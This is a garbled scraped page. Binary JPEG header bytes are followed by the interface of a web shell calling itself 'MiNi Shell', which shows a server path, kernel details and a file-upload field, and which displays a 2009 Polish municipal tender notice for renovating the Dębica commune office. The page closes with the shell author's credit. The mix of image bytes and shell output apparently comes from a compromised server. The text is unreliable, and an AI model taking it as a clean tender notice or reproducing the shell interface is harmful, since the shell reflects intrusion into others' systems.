JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/78727-N-2009.html

<p class="kh_header"><b>Dębica: 1.Remont pomieszczeń  budynku Urzędu Gminy  pomieszczenia GOPS,
2.Termomodernizacja  budynku-elewacji ,remont pochylni dla niepełnosprawnych,
- w ramach zadania MODERNIZACJA  BUDYNKU URZĘDU GMINY W DĘBICY PRZY UL. BATOREGO 13</b><br>
<b>Numer ogłoszenia: 78727 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803339, 6803310, faks 014 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Remont pomieszczeń  budynku Urzędu Gminy  pomieszczenia GOPS,
2.Termomodernizacja  budynku-elewacji ,remont pochylni dla niepełnosprawnych,
- w ramach zadania MODERNIZACJA  BUDYNKU URZĘDU GMINY W DĘBICY PRZY UL. BATOREGO 13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są  roboty  budowlane   : 

 I.  Remont pomieszczeń  budynku Urzędu Gminy  pomieszczenia GOPS tj. :
     -rozbiórka podłóg drewnianych i posadzek,
     - roboty izolacyjne, posadzki - wylewki, posadzki, wykładziny podłogowe, 
     - na ścianach gładzie gipsowe,
     - wymiana stolarki drzwiowej,
     - wykonanie odcinka instalacji wodno - kanalizacyjnej , montaż umywalek,
     - malowanie ścian i sufitów, okładziny ścian,
     - remont instalacji elektrycznej ,
    
II. Termomodernizacja  budynku-elewacji, remont pochylni dla niepełnosprawnych tj. : docieplenie z zewnątrz w technologii lekkiej ,mokrej płytami styropianowymi grub.10 cm połączone z remontem  balkonów zjazdu do piwnicy ,pochylni dla niepełnosprawnych-położenie posadzki antypoślizgowej żywicznej i wymiana balustrad balkonowych, przy zjeździe do piwnicy i przy pochylni dla niepełnosprawnych ,
Opis  przedmiotu  zamówienia  stanowi : 
       
I.  Remont pomieszczeń  budynku Urzędu Gminy  pomieszczenia GOPS :
- dokumentacja   projektowa- wykonana przez firmę : Biuro Projektowe -ART- FAKTORY s.c.  
    arch. Paweł Spędzia i Wioletta Spędzia , 39-200 Dębica ul. Powstania Styczniowego 4.
- specyfikacja  techniczna  wykonania  i  odbioru  robót- wykonana przez Panią mgr inż. Małgorzatę
  Żabicką- Poloczek 
- przedmiar   robót - wykonany przez Pana Eugeniusza Pyzińskiego
     
II. Termomodernizacja  budynku-elewacji, remont pochylni dla niepełnosprawnych : 
-  dokumentacja   projektowa- wykonana przez firmę: Biuro Projektowe -ART- FAKTORY- s.c.  
    arch. Paweł Spędzia i Wioletta Spędzia , 39-200 Dębica ul. Powstania Styczniowego 4.
-  specyfikacja  techniczna  wykonania  i  odbioru  robót- wykonana przez Panią mgr inż. Małgorzatę
  Żabicką- Poloczek 
 -  przedmiary   robót - wykonane przez firmę:  Biuro Projektowe -ART- FAKTORY-  s.c.  
    arch. Paweł Spędzia i Wioletta Spędzia , 39-200 Dębica ul. Powstania Styczniowego 4..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.44.00.00-4, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE  WADIUM
1.	Zamawiający wymaga  wniesienia wadium w wysokości  7 000,00 zł (słownie: siedem tysięcy złotych 00/100). 
2.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
            Wadium wnoszone w pieniądzu należy wnieść przelewem  na konto
        Zamawiającego:  63 12 40 4764 1111 0000 4861 2049  w banku PEKAO SA Oddział w Dębicy.
          W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się  datę 
       i godzinę uznania  kwoty na   rachunku Zamawiającego.

4.       W przypadku Wykonawców  ubiegających się wspólnie o udzielenie zamówienia (art.23 ustawy Pzp) i  
    wniesienia wadium w formie opisanej w art.45 ust.6 pkt 3 i 4 tj. gwarancjach bankowych i
    ubezpieczeniowych- Zamawiający żąda aby w treści gwarancji byli wskazani wszyscy Wykonawcy
    ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy
    konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej).
 
5.      W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego
         wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  w
         Sekretariacie pok. 17  lub zamieścić w osobnej kopercie - opisanej WADIUM dołączonej do oferty.

6.      Nie wniesienie wadium w terminie spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4
         ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.

7.      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli : 
      a)  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26.ust.3 ustawy Pzp , nie złożył 
           dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy Pzp lub pełnomocnictw ,
      b)  Wykonawca, którego oferta została wybrana :
           - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
           - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
           - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie
             Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI  UDZIAŁU W POSTĘPOWANIU   ORAZ  SPOSÓB  OCENY   ICH     SPEŁNIANIA
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:

1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

2) Posiadają  niezbędną  wiedzę  i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi
do wykonania zamówienia  lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału
technicznego i osób zdolnych do wykonania zamówienia.

a) Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) -  wykonał  z należytą starannością minimum 2  roboty budowlane tj. : 
- 1 robota budowlana polegająca na remoncie budynków użyteczności publicznej  
o kubaturze  minimum 250,00  m3  i  wartości  robót  minimum   50 000,00 zł  brutto, oraz załączyć dokument potwierdzający, że robota ta została wykonana należycie,
- 1 robota budowlana polegająca na termomodernizacji (ociepleniu) budynków użyteczności publicznej  o kubaturze  minimum 4 000,00  m3  i  wartości  robót  minimum   250 000,00 zł  brutto, oraz załączyć dokument potwierdzający, że robota ta została wykonana należycie,
Definicja budynku użyteczności publicznej zawarta jest w § 3 pkt. 6 Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r.( Dz. U. z 2002 r. Nr 75 poz. 690 z późn. zmianami)

b) Wykonawca winien  wykazać, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie bez ograniczeń, w zakresie kierowania robotami budowlanymi  tj. : 
- minimum 1 osoba w  specjalności konstrukcyjno budowlanej, ,
- minimum 1 osoba w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych ,wentylacyjnych,
  gazowych, wodociągowych, kanalizacyjnych
- minimum 1 osoba w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
  elektroenergetycznych
- minimum 1 osoba w  specjalności telekomunikacyjnej,

lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia w/w osób zdolnych do wykonania zamówienia.

c) wykonawca winien  wykazać, że osoby na stanowiskach  samodzielnej funkcji technicznej w budownictwie , które będą uczestniczyć w wykonywaniu zamówienia , posiadają  wymagane uprawnienia budowlane bez ograniczeń  w  specjalności : konstrukcyjno-budowlanej, telekomunikacyjnej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych .
-oraz posiadają  ważny wpis na listę członków odpowiedniej Izby Inżynierów Budownictwa i  są ubezpieczone od odpowiedzialności cywilnej, co daje prawo do wykonywania samodzielnych  funkcji technicznych w budownictwie zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5, poz. 42 z 2001 r. z późn. zm.).

  3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia minimum  500 000,00 zł.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia Zamawiający żąda, aby w treści polisy lub innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, byli wskazani wszyscy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej).

  4) Niepodlegają  wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków podmiotowych udziału w postępowaniu nastąpi na podstawie:
1)	złożonych oświadczeń (w zakresie art. 22 ust. 1 i  art. 24 ust. 1 ustawy Pzp ), 
2)	dokumentów potwierdzających spełnianie tych warunków - 
        - metodą: -spełnia / nie spełnia.
Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
ZAMAWIAJĄCY WYKLUCZY WYKONAWCÓW, KTÓRZY:
- nie spełniają warunków udziału w  postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3  w/w ustawy
  Prawo zamówień publicznych,
- wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się 
  w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych
  wykonawców w postępowaniu nie utrudni uczciwej konkurencji (z zastrzeżeniem zamówień udzielanych na
  podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2 ustawy),
- złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
- nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających
  spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy,
- podlegają wykluczeniu na podstawie art. 24 ust. 1 pkt 1 - 9
- nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie
  okresu związania ofertą.
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5. WYKAZ   DOKUMENTÓW  I  OŚWIADCZEŃ ,  JAKIE  MAJĄ   DOSTARCZYĆ   WYKONAWCY  NA POTWIERDZENIE   SPEŁNIANIA   WARUNKÓW   UDZIAŁU   W   POSTĘPOWANIU
5.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.2  Oświadczenie w zakresie art. 24 ust. 1 ustawy Pzp. - Załącznik nr   1 do SIWZ.

5.3  Oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp.-  Załącznik  nr  2 do SIWZ. W przypadku podkreślenia 
w pkt 2 oświadczenia zdania cyt.: -przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - Wykonawca winien załączyć do oświadczenia  zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

5.4 Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5.5 Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5.6 Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 w/w ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.7 Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 w/w ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
UWAGA: Wymóg ten dotyczy wyłącznie podmiotów zbiorowych w rozumieniu ustawy z dnia 28 października 2002r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. Nr 197, poz. 1661), nie dotyczy natomiast przedsiębiorców będących osobami fizycznymi, w tym spółek cywilnych utworzonych przez osoby fizyczne.

5.8 Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że te roboty zostały wykonane należycie. - Załącznik nr 3  do SIWZ 
Wykaz robót winien potwierdzać spełnianie warunków  opisanych  w ust.4 pkt.2 litera a) 
 
5.9 a) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. - Załącznik nr 4 do SIWZ .
b) Jeżeli w wykazie o którym mowa w pkt 5.9 a) wykonawca wskazał osoby którymi będzie dysponował należy przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

5.10 Dokumenty stwierdzające, ze osoby  które będą uczestniczyć w wykonaniu zamówienia i pełnić samodzielną funkcję techniczną w budownictwie  posiadają  wymagane uprawnienia budowlane bez ograniczeń  w specjalności: 
a) konstrukcyjno-budowlanej, 
b) telekomunikacyjnej, 
c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych, 
    kanalizacyjnych, 
d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
 -oraz posiadają ważny  wpis na listę członków odpowiedniej Izby Inżynierów Budownictwa i są ubezpieczone od odpowiedzialności cywilnej, co daje prawo do wykonywania samodzielnych  funkcji technicznych w budownictwie zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5, poz. 42 z 2001 r. z późn. zm.).

5.11  Polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia minimum  500 000,00 zł.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, Zamawiający żąda aby w treści polisy lub innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, byli wskazani wszyscy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej).

5.12 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to :
1)	 zamiast dokumentów o których mowa w pkt  5.1, 5.4, 5.5 i  5.7 - składa dokument lub dokumenty
    wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio ,że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 mieś. przed upływem terminu składania ofert,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 mieś. przed upływem terminu składania ofert,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (dotyczy wyłącznie podmiotów zbiorowych określonych w przepisach o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary) - wystawiony nie wcześniej niż 6 mieś. przed upływem terminu składania ofert
2)	zamiast dokumentu o którym  mowa w pkt. 5.6 - składa zaświadczenie właściwego organu sądowego lub
      administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie
      określonym w art.24 ust.1 pkt 4-8 w-w ustawy - wystawiony nie wcześniej niż 6 mieś. przed upływem terminu
      składania ofert.

5.13  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.5 pkt. 5.12 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia tych dokumentów stosuje się odpowiednio jak w pkt 5.12 .

5.14 W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane dokumenty i oświadczenia wymienione w punkcie  5.1 , 5.2 , 5.3, 5.4, 5.5, 5.6, 5.7    muszą  być złożone  przez każdego z  Wykonawców osobno. W przypadku złożenia oferty przez spółkę cywilną w-w dokumenty i oświadczenia muszą być złożone przez każdego wspólnika spółki cywilnej odrębnie tj.  z wskazaniem  imienia i nazwiska wspólnika ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica ,39-200 Dębica,  ul. Batorego 13- pokój 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 10:00, miejsce: Urząd Gminy Dębica ,39-200 Dębica,  ul. Batorego 13- Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com